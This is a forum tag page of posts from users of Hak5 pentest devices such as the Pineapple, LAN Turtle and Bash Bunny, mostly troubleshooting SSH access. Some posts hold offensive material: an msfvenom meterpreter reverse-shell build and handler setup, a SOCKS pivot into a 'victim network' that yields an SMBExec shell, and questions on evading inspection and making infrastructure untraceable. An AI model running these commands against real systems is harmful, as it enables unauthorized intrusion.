Showing results for tags 'ssh'.

  1. Is there a certain encryption algorithm that I should use when creating an ssh key pair that will bypass network-based inline traffic inspectors (e.g. CryptoAuditor)? Maybe I'm using the wrong one (ssh-keygen -t rsa -b 4096) and I'll get pulled up? Any info on how these bits of kit make me visible and how to bypass them will be greatly appreciated.
  2. This was not my original script, it was created for OpenWRT operating systems, but it did not work on the Tetra by default. I simply made a fork and modified it for anyone who would like to switch to Oh My ZSH as their default SSH terminal vs busybox(ash). I know I wanted to ?! Here is the quick copy and paste script:

        opkg update && opkg install ca-certificates zsh curl git-http
        sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"
        sed -i -- 's:/bin/ash:/bin/zsh:g' /etc/passwd
        #reboot

     Or view below.. Gist Code

     PS: I do not own any other Pineapple models, so I can not tell you if it works for others.
  3. For a larger project, I am exploring the use of PowerShell to automate network tasks. In the enclosed script, I am assuming someone has a Raspberry Pi named PiM3.local with default username and password on my local network. I use Posh-SSH, which can be installed within PowerShell by Install-Module Posh-SSH. I then execute a command with SSH, grab the .bash-history and put a new file in the Pi. One could, of course, use nmap to find computers with port 22 and then proceed with something like this to see what happens. One could of course use the wifi pineapple to ... and so on. Are there loose Pis where you live? RaspberySFTP.ps1
  4. My kali machine is in a LAN. In order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel

        ssh -N -R 45679:localhost:45679 user@aaa.aaa.aaa.aaa -p 45678

     The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. Tested with netcat, and apache server, worked.

     Now, here is the configuration of the malware generated by msfvenom

        msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe

     And here is the multi/handler configuration under msf

        msf exploit(handler) > show options

        Module options (exploit/multi/handler):

           Name  Current Setting  Required  Description
           ----  ---------------  --------  -----------

        Payload options (windows/x64/meterpreter/reverse_tcp):

           Name      Current Setting  Required  Description
           ----      ---------------  --------  -----------
           EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
           LHOST     192.168.0.102    yes       The listen address
           LPORT     45679            yes       The listen port

        Exploit target:

           Id  Name
           --  ----
           0   Wildcard Target

     Then I exploit, nothing happens on the handler, no session received, but the ssh terminal continuously shows the following message once I run the malware on the victim machine

        connect_to localhost port 45679: failed.
        connect_to localhost port 45679: failed.
        connect_to localhost port 45679: failed.

     I did a scan on aaa.aaa.aaa.aaa:45679, no open port discovered. Since NC and apache test works, SSH tunnel should be functioning properly, so it is the handler's problem? My thought is, the multi handler is somehow not listening/connecting to the tunneled port, but I am not sure how could that happen, doesn't remote ssh tunnel automatically apply to global once the command is running? Any ideas, or workarounds? This should be a FAQ, yet, couldn't find right way... Thank you
  5. When running the following payload:

        LED G
        ATTACKMODE RNDIS_ETHERNET

     And try to SSH into the bunny (172.16.64.10) with Putty. As root I always get 'Access Denied'. I've changed the default password using attackmode serial but that password is not working for SSH. I even set it back to the default hak5bunny password, but still no joy. What am I missing here?
  6. Hello I am thinking of buying a smash rabbit and I want to find out a way to ssh into it. I heard that if I want to SSH into the rabbit I have to "waste" a payload for the bunny to emulate RNIDS_ETHER. Is this correct? Or is there some other way for it to emulate a usb-to-ethernet adapter upon boot without having to use a payload? I dunno, stick something in the .profile? Thanks!
  7. Hi, if I install avahi-daemon and put ATTACKMODE RNIDS_ETHER in something like .bashrc or .profile, can I SSH into the bunny with sudo ssh root@bunny.local? I greatly prefer SSH over serial so I would really like my method above to work. I don't own a bash bunny, although I might buy it at some point, I'm just considering. Thanks!
  8. So I received my Wifi Pineapple NANO a few days ago and it worked fine on first try. I got on to the web interface and reached the point of updating the firmware, and I think I may have messed up. Now whenever I plug the nano in, the light flashes twice, holds for about 5 seconds, then turns off. I can't ssh to it, I can't get the web interface and I can't see it as a wifi network. Any advice?
  9. Hey all, I'm new, had the LAN turtle for about three weeks and I'm loving it. I have limited knowledge of the RF spectrum and I'm new to networks etc, but I've learnt so much by solving problems as I've gone along. However one thing I'm stuck with is setting up an SSH tunnel to the turtle remotely, in order to get a more diverse capture than I believe URLsnarf is capable of.

     Current setup
     • Windows 10 putty (and/or Kali in Vbox)
     • SSH to a digitalocean VPS
     • SSH into my turtle remotely.

     I've searched the forums and googled for "wireshark remote ssh capture" etc, but everything I find seems either irrelevant or goes way over my head. From what I did understand it seems like I may not be able to do it. And I figured if it was possible, wouldn't everyone be using Wireshark instead of URLSnarf (which seems basic to me)?

     Questions
     • Do any of you gurus know if it is possible to get a relatively comprehensive live capture from the LAN turtle via SSH?
     • Has anyone done this yet?
  10. ===========================SOLUTION==============================
      Generate the following payload without STORAGE in the attackmode.

         #!/bin/bash
         LED G
         ATTACKMODE ECM_ETHERNET

      Thanks to Fang_Shadow, I've learned that using storage in concert with ECM_ETHERNET prevents the system from pulling an IP (for what reason I still don't understand - I'm guessing it's just a bug). I have had some issues with SSH but according to ifconfig (on local system) I see the interface is up and nmap scans show port 22 is open on the new IP. I'll update this post if anything changes.
      ===================================================================

      Endgoal: I want to ssh from host machine into my BashBunny, then pivot from my BashBunny to a remote cloud hosted webserver, and write a testfile to that server.

      Host System Used: Debian Linux

      Crux: I am unable to acquire an ip address for my BashBunny using bb.sh

      Attempts:

      1. I tried to perform these actions from Arming Mode using the serial connection, however I learned that I am not able to share my network connection from serial mode and that Arming Mode only allows: Serial and Storage

      2. I attempted to run the default payload in order to gain network connectivity:

         #!/bin/bash
         LED G
         ATTACKMODE ECM_ETHERNET STORAGE

         My understanding of this code is that it will indicate it is ready when there is a solid green light (LED G) and that it will facilitate Ethernet connectivity and Storage (Last line). It is also my understanding that this initializes a new network interface that can be seen with the commands "ip addr" or "ifconfig -a". However this new interface does not appear to be configured yet and attempting to run the command ssh root@172.16.64.1 does not result in the expected login prompt and eventually times out.

      3. I've also attempted to run the bb.sh in order to share my host's network connection, despite not being able to ssh into 172.16.64.1 IP. The script appears to work until you attempt to connect with it, and then it just hangs.

      Any ideas on how to ssh into the BashBunny? Thanks, Jay
  11. I am unable to SCP or SSH to the mark V. Getting "permission denied" error for both. This has been constant prior to today; however, today when minimizing infusions they will no longer maximize again and I cannot factory reset or even properly reboot the device. So I need to be able to reflash it over SSH. Any ideas? Am I overlooking something here? Using port 22 for both.
  12. I want to automate an SSH login. I was looking at sshpass or expect. But I haven't been able to find a working example of either. Anybody use either of these? Also something of note. I don't know the hostname of the remote machine yet. I'm trying to get that in an automated way as well. I've tried traceroute, smbclient, nslookup, host, arp, and finger. Expect needs to expect user@host before it can send any commands over SSH but I don't know the hostname at this point.
  13. I am a complete noob at this, so I could be doing something completely wrong. Just got the Lan turtle today. Plugged it in with a phone charger meeting minimum power requirements and connected it to a PC with an OTG ethernet-to-USB adapter. Had to setup the network connection manually (on Ubuntu 16.10) with: IP - 172.16.84.1, Netmask - 255.255.255.0, Gateway - 192.168.1.1, DNS Servers - 208.67.222.222 and 208.67.220.220. After that, I checked the connection with ifconfig and everything appears to be OK, so I finally tried connecting to the Lan Turtle.

         :$ ssh root@172.16.84.1
         Permission denied (publickey).

      I have setup openssh on a few of my PCs for ssh-key authentication only, but this is the first time using the Lan Turtle. Also realised I cannot browse on the internet while it is connected, even with wifi and another wired connection available. I have searched around to see if there is a fix for this, but I cannot find anything.
  14. I have followed Hak5's YouTube instructions in LAN turtle basics of how to setup auto SSH. I have a remote server. SSH works if the lanturtle is plugged into the device sshing into it. However auto ssh does not work unless I type

         iptables -I INPUT 1 -i eth1 -p tcp --dport 22 -j ACCEPT

      But if I reboot the LAN turtle, I cannot ssh into it from my remote server unless I rerun the iptables command. Putting

         iptables -I INPUT 1 -i eth1 -p tcp --dport 22 -j ACCEPT

      in /etc/firewall.user does not help. Any ideas?
  15. Hi, Just looking for some advice on using python pickle to create an authentic looking filesystem for cowrie, has anyone experience of this? I have run the createfs.py script from the cowrie utils folder and created a fake filesystem based on the system's filesystem, however this won't be great as there are a fair few clues that it is a honey pot (the user called cowrie, the cowrie folder etc etc.). Thanks in advance.
  16. Hey guys, I was checking the System Log as I saw the following entries:

         auth.err sshd[2499]: error: Could not load host key: /etc/ssh/ssh_host_ecdsa_key
         auth.err sshd[2499]: error: Could not load host key: /etc/ssh/ssh_host_ed25519_key

      I recently made a fresh factory reset and update to 1.0.6. SSH into the pineapple is possible, but I wonder why the keys were not generated. Anyone else with this error message?
  17. Hi all, How would you go about setting up a stand-alone Raspberry Pi, which would:

      • Be powered by solar, battery, or any other method. At least a few days power, if possible.
      • Have some sort of internet connection available, so one can SSH / NetCat to it. (Dongle?)
      • Be as small and discreet as possible, so it doesn't get stolen.

      *edit* Think weather monitoring station, but too far away to connect to the same WiFi network as your home PC, and not in range of any free WiFi hotspots.
  18. (please notice that this is being conducted as a security evaluation in my own company, nothing in here can get me in legal trouble since I own the network and all the computers connected to it) Hi, I need to create a relay server for my pineapple to ssh to when I deploy it in position. The thing is, I need it to be completely untraceable back to me, otherwise my IT guys would find it too easily. They know they're going to be tested, they agreed to it and to not knowing when this is going to happen. My question is, how would you guys go about:

      • buying the hosting/remote server/vps so that it cannot be connected back to you?
      • what kind of server would you use for a relay server?
      • what security measures would you take so your anonymity is preserved?

      Thanks a lot!
  19. Hello! After reading about the LanTurtle and watching the videos for it I have a few questions about the product before I purchase it. Let's make the example that I have successfully installed the LanTurtle on a targeted computer. I've got remote SSH connection to Turtle and a meterpreter session active. As I've understood correctly the lanturtle is the only equipment on the network I have access to and not even the computer it is attached to! So if I want to get access to computers on the network I could use the meterpreter session and launch attacks to the computers from the turtle and get a new meterpreter into the new computer and work from there? If there is a vulnerable computer on the network of course. Can the Turtle which is connected to the network also visit network folders/disks? Let's say there is a computer/Server sharing files and it's accessible by anyone on the network. Can the Turtle access these network folders if they are open for the network the Turtle is connected to and transfer these files to the SSH server for example? I'm pretty new to metasploit but still learning how it works and how it would work out with the LanTurtle the practical way. Also a great tool when I perform pentest for the local companies (FYI: legal and paid work, I don't plan to abuse this if someone were to ask). I mostly do physical testing and assessment and this would be a really good tool for me as my other co-worker does the software/web part.
  20. Hi everyone. I'm new here. Let me introduce myself: my name is Alexandre, I'm from Brazil. I have been learning a lot about penetrating and hack mods here. I have a test I'm trying to make and I'm not pretty sure how to complete this. The scenario is this: I need to be able to connect to my work network to work from home. I work in a support 7/24; sometimes I don't want to come to work because it is just me alone in front of the computer, and sometimes I spend all week with no issue, so I want to be able to open an intranet site in my house. What is the best way to accomplish this? Can I create a VPN between my house connection and turtle module, then in my browser be able to open a local intranet webpage? Maybe a Raspberry Pi with some tools? I can provide my own credentials to the box, so I think it will have the same privileges as me. How can this be done? mitmproxy? How can I act like I'm at work? Is this possible? Is it just a dream? Sorry, my English is not that good. Thanks in advance.
  21. Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle.

      My setup:

         [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network]

      I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts

      I used the first line, which was this command:

         ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c

      Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222. By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly.

      Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran

         root@kali#proxychains ./Veil-Pillage

      Which would take me to dialogue screen, I chose number 25, set my target (which was 10.13.37.27, a win7 VM) and my creds, and just hit run!

         Veil-Pillage: post-explotation framework | [Version]: 1.1.2
         =========================================================================
         [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
         =========================================================================
         [*] Executing module: Smbexec Shell...
         [*] Type 'exit' to exit the shell
         Trying protocol 445/SMB...
         Creating service SystemDiag...
         |S-chain|-<>-***.***.***.***-<><>-10.13.37.27:445-<><>-OK
         [!] Launching semi-interactive shell - Careful what you execute
         C:\Windows\system32>

      And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts!

      TL;DR: SSH socks proxy --

         root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS

      then change proxychains.conf, then "proxychains tool"
  22.    root@Pinebox:~# nano .test
         Error opening terminal: xterm-256color.

      I ssh'd into my pineapple today after doing a factory restore, and started getting this error. Anybody gotten this before?
  23. Hi guys, I recently started learning more about ethical hacking and stumbled upon metasploit. It is a great tool but I am having an issue on a pen test, which is the following. I am trying to exploit my iPad Air - iOS 8.1.1 Jailbroken and I am using the exploit "exploit/apple_ios/ssh/cydia_default_ssh". Also the OS I am running is Kali Linux. I am able to setup the RHOST with my IP Address (192.168.1.2) and the default port 22. This data is confirmed and accurate as I did a nmap scan just before that showed me that the port 22 was open on that IP. Everything seems fine until I try to run the exploit, what happens is this:

         [*] 192.168.1.2:22 - Attempt to login as 'root' with password 'alpine'
         [-] 192.168.1.2:22 SSH Error: Net::SSH::Exception : could not settle on kex algorithm
         [*] 192.168.1.2:22 - Attempt to login as 'mobile' with password 'dottie'
         [-] 192.168.1.2:22 SSH Error: Net::SSH::Exception : could not settle on kex algorithm

      I have left the root:alpine login as per default in my iPad. I had even changed the password in my iPad's terminal and tried to login via Armitage with SSH Login and the updated credentials. Still, I am always getting the same error and not sure what is going on. Can anyone help here? Cheers
  24. I am running an ssh server on my Ubuntu server but I don't like to use the default port of 22. I have the relay server working with auto ssh on the pineapple using port 22. Is there a way that I can use a different port with the Auto ssh? Thank you Mark.
  25. Hello, I have successfully enabled AutoSSH on my Pineapple so I can remotely access the web interface (e.g. 164.84.38.155:666). However, I am having trouble SSH'ing into it via command line. I am trying to SSH into the exact same address which is working from the browser GUI (164.84.38.155:666), but it is not working. When I try:

         ssh root@164.84.38.155:666

      I get this error:

         ssh: Could not resolve hostname 164.84.38.155:666: Name or service not known

      Is there a different address I'm supposed to SSH into or some other setting I need to configure? Thanks.